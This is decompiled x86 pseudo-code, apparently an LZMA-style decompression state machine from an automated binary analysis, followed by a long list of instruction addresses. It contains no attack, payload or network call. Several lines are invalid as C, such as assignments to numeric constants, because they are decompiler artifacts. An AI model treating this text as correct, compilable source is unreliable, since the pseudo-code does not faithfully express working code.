                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L60;
                                  							} else {
                                  								goto L58;
                                  							}
                                  						case 0x10:
                                  							L109:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x10;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t365 = __ebp - 0x70;
                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t365;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							goto L111;
                                  						case 0x11:
                                  							goto L69;
                                  						case 0x12:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 0x58);
                                  								 *(__ebp - 0x84) = 0x13;
                                  								__esi =  *(__ebp - 0x58) + 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							__eflags = __eax;
                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                  							goto L130;
                                  						case 0x13:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								_t469 = __ebp - 0x58;
                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  								__eflags =  *_t469;
                                  								 *(__ebp - 0x30) = 0x10;
                                  								 *(__ebp - 0x40) = 8;
                                  								L144:
                                  								 *(__ebp - 0x7c) = 0x14;
                                  								goto L145;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							 *(__ebp - 0x30) = 8;
                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  							L130:
                                  							 *(__ebp - 0x58) = __eax;
                                  							 *(__ebp - 0x40) = 3;
                                  							goto L144;
                                  						case 0x14:
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  							__eax =  *(__ebp - 0x80);
                                  							goto L140;
                                  						case 0x15:
                                  							__eax = 0;
                                  							__eflags =  *(__ebp - 0x38) - 7;
                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  							__al = __al & 0x000000fd;
                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  							goto L120;
                                  						case 0x16:
                                  							__eax =  *(__ebp - 0x30);
                                  							__eflags = __eax - 4;
                                  							if(__eax >= 4) {
                                  								_push(3);
                                  								_pop(__eax);
                                  							}
                                  							__ecx =  *(__ebp - 4);
                                  							 *(__ebp - 0x40) = 6;
                                  							__eax = __eax << 7;
                                  							 *(__ebp - 0x7c) = 0x19;
                                  							 *(__ebp - 0x58) = __eax;
                                  							goto L145;
                                  						case 0x17:
                                  							L145:
                                  							__eax =  *(__ebp - 0x40);
                                  							 *(__ebp - 0x50) = 1;
                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  							goto L149;
                                  						case 0x18:
                                  							L146:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x18;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t484 = __ebp - 0x70;
                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t484;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L148:
                                  							_t487 = __ebp - 0x48;
                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                  							__eflags =  *_t487;
                                  							L149:
                                  							__eflags =  *(__ebp - 0x48);
                                  							if( *(__ebp - 0x48) <= 0) {
                                  								__ecx =  *(__ebp - 0x40);
                                  								__ebx =  *(__ebp - 0x50);
                                  								0 = 1;
                                  								__eax = 1 << __cl;
                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  								__eax =  *(__ebp - 0x7c);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								goto L140;
                                  							}
                                  							__eax =  *(__ebp - 0x50);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  							__eax =  *(__ebp - 0x58);
                                  							__esi = __edx + __eax;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__ax =  *__esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								__cx = __ax >> 5;
                                  								__eax = __eax - __ecx;
                                  								__edx = __edx + 1;
                                  								__eflags = __edx;
                                  								 *__esi = __ax;
                                  								 *(__ebp - 0x50) = __edx;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L148;
                                  							} else {
                                  								goto L146;
                                  							}
                                  						case 0x19:
                                  							__eflags = __ebx - 4;
                                  							if(__ebx < 4) {
                                  								 *(__ebp - 0x2c) = __ebx;
                                  								L119:
                                  								_t393 = __ebp - 0x2c;
                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                  								__eflags =  *_t393;
                                  								L120:
                                  								__eax =  *(__ebp - 0x2c);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  									goto L170;
                                  								}
                                  								__eflags = __eax -  *(__ebp - 0x60);
                                  								if(__eax >  *(__ebp - 0x60)) {
                                  									goto L171;
                                  								}
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  								__eax =  *(__ebp - 0x30);
                                  								_t400 = __ebp - 0x60;
                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  								__eflags =  *_t400;
                                  								goto L123;
                                  							}
                                  							__ecx = __ebx;
                                  							__eax = __ebx;
                                  							__ecx = __ebx >> 1;
                                  							__eax = __ebx & 0x00000001;
                                  							__ecx = (__ebx >> 1) - 1;
                                  							__al = __al | 0x00000002;
                                  							__eax = (__ebx & 0x00000001) << __cl;
                                  							__eflags = __ebx - 0xe;
                                  							 *(__ebp - 0x2c) = __eax;
                                  							if(__ebx >= 0xe) {
                                  								__ebx = 0;
                                  								 *(__ebp - 0x48) = __ecx;
                                  								L102:
                                  								__eflags =  *(__ebp - 0x48);
                                  								if( *(__ebp - 0x48) <= 0) {
                                  									__eax = __eax + __ebx;
                                  									 *(__ebp - 0x40) = 4;
                                  									 *(__ebp - 0x2c) = __eax;
                                  									__eax =  *(__ebp - 4);
                                  									__eax =  *(__ebp - 4) + 0x644;
                                  									__eflags = __eax;
                                  									L108:
                                  									__ebx = 0;
                                  									 *(__ebp - 0x58) = __eax;
                                  									 *(__ebp - 0x50) = 1;
                                  									 *(__ebp - 0x44) = 0;
                                  									 *(__ebp - 0x48) = 0;
                                  									L112:
                                  									__eax =  *(__ebp - 0x40);
                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  										_t391 = __ebp - 0x2c;
                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  										__eflags =  *_t391;
                                  										goto L119;
                                  									}
                                  									__eax =  *(__ebp - 0x50);
                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  									__eax =  *(__ebp - 0x58);
                                  									__esi = __edi + __eax;
                                  									 *(__ebp - 0x54) = __esi;
                                  									__ax =  *__esi;
                                  									__ecx = __ax & 0x0000ffff;
                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                  									if( *(__ebp - 0xc) >= __edx) {
                                  										__ecx = 0;
                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  										__ecx = 1;
                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  										__ebx = 1;
                                  										__ecx =  *(__ebp - 0x48);
                                  										__ebx = 1 << __cl;
                                  										__ecx = 1 << __cl;
                                  										__ebx =  *(__ebp - 0x44);
                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                  										__cx = __ax;
                                  										__cx = __ax >> 5;
                                  										__eax = __eax - __ecx;
                                  										__edi = __edi + 1;
                                  										__eflags = __edi;
                                  										 *(__ebp - 0x44) = __ebx;
                                  										 *__esi = __ax;
                                  										 *(__ebp - 0x50) = __edi;
                                  									} else {
                                  										 *(__ebp - 0x10) = __edx;
                                  										0x800 = 0x800 - __ecx;
                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  										 *__esi = __dx;
                                  									}
                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                  										L111:
                                  										_t368 = __ebp - 0x48;
                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                  										__eflags =  *_t368;
                                  										goto L112;
                                  									} else {
                                  										goto L109;
                                  									}
                                  								}
                                  								__ecx =  *(__ebp - 0xc);
                                  								__ebx = __ebx + __ebx;
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  									__ecx =  *(__ebp - 0x10);
                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  									__ebx = __ebx | 0x00000001;
                                  									__eflags = __ebx;
                                  									 *(__ebp - 0x44) = __ebx;
                                  								}
                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                  									L101:
                                  									_t338 = __ebp - 0x48;
                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                  									__eflags =  *_t338;
                                  									goto L102;
                                  								} else {
                                  									goto L99;
                                  								}
                                  							}
                                  							__edx =  *(__ebp - 4);
                                  							__eax = __eax - __ebx;
                                  							 *(__ebp - 0x40) = __ecx;
                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  							goto L108;
                                  						case 0x1a:
                                  							L56:
                                  							__eflags =  *(__ebp - 0x64);
                                  							if( *(__ebp - 0x64) == 0) {
                                  								 *(__ebp - 0x88) = 0x1a;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x68);
                                  							__al =  *(__ebp - 0x5c);
                                  							__edx =  *(__ebp - 8);
                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  							 *( *(__ebp - 0x68)) = __al;
                                  							__ecx =  *(__ebp - 0x14);
                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                  							__eax = __ecx + 1;
                                  							__edx = 0;
                                  							_t192 = __eax %  *(__ebp - 0x74);
                                  							__eax = __eax /  *(__ebp - 0x74);
                                  							__edx = _t192;
                                  							goto L79;
                                  						case 0x1b:
                                  							goto L75;
                                  						case 0x1c:
                                  							while(1) {
                                  								L123:
                                  								__eflags =  *(__ebp - 0x64);
                                  								if( *(__ebp - 0x64) == 0) {
                                  									break;
                                  								}
                                  								__eax =  *(__ebp - 0x14);
                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  								__eflags = __eax -  *(__ebp - 0x74);
                                  								if(__eax >=  *(__ebp - 0x74)) {
                                  									__eax = __eax +  *(__ebp - 0x74);
                                  									__eflags = __eax;
                                  								}
                                  								__edx =  *(__ebp - 8);
                                  								__cl =  *(__eax + __edx);
                                  								__eax =  *(__ebp - 0x14);
                                  								 *(__ebp - 0x5c) = __cl;
                                  								 *(__eax + __edx) = __cl;
                                  								__eax = __eax + 1;
                                  								__edx = 0;
                                  								_t414 = __eax %  *(__ebp - 0x74);
                                  								__eax = __eax /  *(__ebp - 0x74);
                                  								__edx = _t414;
                                  								__eax =  *(__ebp - 0x68);
                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  								__eflags =  *(__ebp - 0x30);
                                  								 *( *(__ebp - 0x68)) = __cl;
                                  								 *(__ebp - 0x14) = _t414;
                                  								if( *(__ebp - 0x30) > 0) {
                                  									continue;
                                  								} else {
                                  									goto L80;
                                  								}
                                  							}
                                  							 *(__ebp - 0x88) = 0x1c;
                                  							goto L170;
                                  					}
                                  				}
                                  			}













                                  0x00000000
                                  0x00406398
                                  0x00406398
                                  0x0040639c
                                  0x00406453
                                  0x00406456
                                  0x00406462
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x004066b8
                                  0x004066b8
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x0040672e
                                  0x0040672e
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x00406709
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x00000000
                                  0x004068bc
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x0040672b
                                  0x00000000
                                  0x0040672b
                                  0x004063a2
                                  0x004063a6
                                  0x004068e7
                                  0x004068e7
                                  0x004068ea
                                  0x004068ee
                                  0x004068ee
                                  0x004063ac
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x004068d2
                                  0x004068da
                                  0x004068e1
                                  0x004068e3
                                  0x00000000
                                  0x004068e3
                                  0x004063c6
                                  0x004063c9
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x004063fa
                                  0x004063fa
                                  0x004063fa
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x00000000
                                  0x004060d9
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x0040609e
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x004060b5
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x00000000
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x00000000
                                  0x00406424
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x00000000
                                  0x004066b5
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00000000
                                  0x00406828
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
